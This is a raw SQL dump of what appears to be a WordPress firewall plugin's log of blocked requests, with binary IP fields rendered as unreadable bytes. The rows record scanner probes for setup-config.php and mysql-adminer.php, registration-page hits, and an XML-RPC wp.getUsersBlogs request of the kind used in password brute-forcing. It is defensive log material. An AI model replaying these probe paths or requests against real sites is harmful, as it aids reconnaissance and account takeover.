Safari/537.36?','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓ›ÿÝ*Crj—UrŠÍ>áÔÉ4ást0>m\0øˆe*Pó:7K|0V/¥¢·zRhÌGI¬µG.ºr¦‹ÙÃ3\n',''),(15679,1573442565,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓ‘¨zpbyeÈ?¦¨fìDæFoëÿ(!œ;ã €`-:OúØ%4/Š\"ä7{„ŠõRCƒÙ£<Øä‰,&<™',''),(15680,1573442567,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓn †äTØ?e„ÛªÙ|Wµ|Î¹hFg¾dà½ã`7l\"Ÿ‡kç_z(I±[Aß˜¡gðT¯Ž¬‹Bú™áv',''),(15681,1573442569,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓã©c<k¿øV™ª3˜ïeÄ„#ûpÚéíáÌ¸Ü¼^‹”¹­ò—7éi_tî¢˜8Ñ‹]5ÏC!•Ž¸ìuXPØho',''),(15682,1573442572,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓ›ÿÝ*Crj—UrŠÍ>áÔÉ4ást0>m\0øˆe*Pó:7K|0V/¥¢·zRhÌGI¬µG.ºr¦‹ÙÃ3\n',''),(15747,1573551308,'Ð”d(²±‹ûJqx\"Ä','','login',0,'GB','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.95 Safari/537.36 Core/1.50.1659.400 QQBrowser/9.5.9769.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15741,1573529327,'úÓöáö2ÍØã<â½','','admin',0,'SG','blocked','GET[80]:/2019/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15742,1573529629,'‡&¥Éêújn—›\Zš/.û','','admin',0,'IT','blocked','GET[80]:/news/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15740,1573528840,'õ3_µ\n~ÜvÇPÊYw‹','','admin',0,'TW','blocked','GET[80]:/new/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15693,1573451776,'›«–nX³¼/3­ÚBZa','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15694,1573451777,'›«–nX³¼/3­ÚBZa','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15695,1573451779,'›«–nX³¼/3­ÚBZa','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15628,1573304882,'¥«‘ä£ñ”Új,dzxy','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15627,1573304879,'ÊQ÷ÈF9YÀ°‡Ùí‹','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15626,1573304877,'X”h³‰ÿ¦Ro+žŒ`®','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15631,1573311038,'úÓöáö2ÍØã<â½','','admin',0,'SG','blocked','GET[80]:/new/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15629,1573310115,'°|-¥¨¡£³¶ÙÍL6î','','admin',0,'US','blocked','GET[80]:/demo/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15630,1573310970,'}—%(r‚U1ÉµO‰','','xmlrpc',0,'HU','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1','ÍÆn8oÊ)[qoðÅœ³0','<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>bintara.com.my</string></value></param><param><value><string>1</string></value></param></params></methodCall>'),(15650,1573393932,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15651,1573393934,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15640,1573336249,'_3\ZÚŸÔ¹eÏ÷éW','','admin',0,'FR','blocked','GET[80]:/dev/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15652,1573393937,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15646,1573385694,'…“m€óxaYOnLPÊªÝ','','login',0,'FR','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','ÍÆn8oÊ)[qoðÅœ³0',''),(15739,1573528085,'2àzKœÌ4Ð)*Féâ0','','admin',0,'US','blocked','GET[80]:/demo/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15634,1573318557,'#÷;ƒ,&}(Ge‘›I–','','admin',0,'FR','blocked','GET[80]:/blogs/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15623,1573304868,'¥«‘ä£ñ”Új,dzxy','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15620,1573302979,'‡&¥Éêújn—›\Zš/.û','','admin',0,'IT','blocked','GET[80]:/v1/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15622,1573304865,'ÊQ÷ÈF9YÀ°‡Ùí‹','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15621,1573304863,'/%wqÚ€ó¢H^àƒ*ý','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15612,1573296604,'Ÿ‘m°ì×,	jæïUQBÀn','','login',0,'ID','blocked','GET[80]:/wp-login.php?','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15611,1573296596,'ÿ@¬6=ÞÕjË)è}=Þœ','','login',0,'PE','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1„¿\ZBW<YL¹Î—ÔJÈN¿w™\\­:W±g=’˜ŒñHMˆÌ9…ÿÛÈÿ\"0+Z•§s¹8èO:ÏBp×H}›“àJaž‰M ÏÄK1–ð«éãìBìnÁtó,vwªN/~+ÓšÕe}(ÓxÖ”l´ñÒê÷³œŸ89ÀŸ\\ÂnÎ¿üv`é‘Ý?Å]mÜþ',''),(15607,1573286213,'v±uQ¶H¿E“æêqõ«','','admin',0,'US','blocked','GET[80]:/v2/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15599,1573285788,'|îßRåw\ZÛëx\0¦‹','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15600,1573285790,'|îßRåw\ZÛëx\0¦‹','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15601,1573285792,'ŠÚ&^lé˜O[¨fcuŽ','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15567,1573212905,'j©¦úàŒÃ‹^ïsªîr³','','login',0,'US','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) DownloaderChrome/62.0.3202.75 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”½Ô—©Û0…–­¨QÂý–XÓåaCpæð3™bv',''),(15568,1573212927,'xb$+’´U3rTõÐ×:','','login',0,'US','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) DownloaderChrome/62.0.3202.75 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”½Ô—©Û0…–­¨QÂý–XÓåaCpæð3™bv',''),(15624,1573304871,'Ü†¾(›Í‘B¡¹Ê¦Á®','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15558,1573163503,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15605,1573285801,'ŠÚ&^lé˜O[¨fcuŽ','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15606,1573285921,'B«â…‹œÚÐOïRýApfë','','admin',0,'FR','blocked','GET[80]:/old/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15604,1573285799,'$á3Y	`4M`ÏúœÃg2','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15595,1573275237,'Tœäüé\\æšþí·„','','admin',0,'US','blocked','GET[80]:/2018/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15603,1573285797,'Ä¸Xó8°¶rîà[¥¥{','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15602,1573285795,'	‚+¸\r?B9Í¾½‚ñ$O','','login',0,'CA','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15596,1573280412,'è/ÂBƒÒHß½¡]¼Œ','','admin',0,'DE','blocked','GET[80]:/1/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15597,1573283361,'5ãÿkç/õ}T3Bô¬‚','','admin',0,'US','blocked','GET[80]:/newsite/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15598,1573285786,'ëÁJ7¸[›ëËŽkLo’Oë','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15610,1573296574,'«Š\"3%2r2„Æ·qe]','','login',0,'VN','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15608,1573294297,'qôQO”{uœ×›ë9}`6A','','admin',0,'TW','blocked','GET[80]:/1/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15609,1573296366,'¯}Ç!Ðw	 5A×¤ºf','','admin',0,'SG','blocked','GET[80]:/demo/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15635,1573321633,'ooq¿¹ï˜â ©/L¸à','','admin',0,'JP','blocked','GET[80]:/wp2/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15636,1573321751,'Ñö)SŠhˆŽMMm‰\Z','','xmlrpc',0,'US','closed','GET[80]:/xmlrpc.php','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','ÍÆn8oÊ)[qoðÅœ³0',''),(15637,1573321753,'Ñö)SŠhˆŽMMm‰\Z','','login',0,'US','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','ÍÆn8oÊ)[qoðÅœ³0',''),(15787,1573657257,'<‹ÇÛV›{.VnD-1','','login',0,'GR','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','ÍÆn8oÊ)[qoðÅœ³0',''),(15589,1573256071,'Êôª¶Õ¨HÄˆtM{Ñ$','','admin',0,'US','blocked','GET[80]:/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15590,1573260524,'iû¯¼m,\n‚DXñ','','admin',0,'US','blocked','GET[80]:/blog/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15591,1573261368,'èzû×jRãð`[T\'ß','','admin',0,'KR','blocked','GET[80]:/2018/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15792,1573675757,'ür¥¢ÄÚ¼‘¢aÄQ3Ç','','login',0,'UA','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15793,1573676212,'Êë’DiÆs¶Á/Ñ=–¤¯','','xmlrpc',0,'US','closed','GET[80]:/xmlrpc.php?rsd','?Mozilla/5.0 (compatible; DuckDuckBot-Https/1.1; https://duckduckgo.com/duckduckbot)?','ÍÆn8oÊ)[qoðÅœ³0',''),(15794,1573676215,'Êë’DiÆs¶Á/Ñ=–¤¯','','xmlrpc',0,'US','closed','GET[443]:/xmlrpc.php?rsd','?Mozilla/5.0 (compatible; DuckDuckBot-Https/1.1; https://duckduckgo.com/duckduckbot)?','R&äO­MšÞræ\"‰væ}',''),(15588,1573254423,'Tœäüé\\æšþí·„','','admin',0,'US','blocked','GET[80]:/store/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15585,1573250929,'’îböfeÂ«°’Fœ\ZäÍ','','admin',0,'IT','blocked','GET[80]:/portal/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15586,1573253469,'v‹ëÏ¨&5z…™2,','','admin',0,'RS','blocked','GET[80]:/www/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15587,1573253486,'¼€Ú»¦ˆ%[”è®³¼U:','','admin',0,'FR','blocked','GET[80]:/oldsite/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15577,1573235112,'5ãÿkç/õ}T3Bô¬‚','','admin',0,'US','blocked','GET[80]:/wordpress/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRw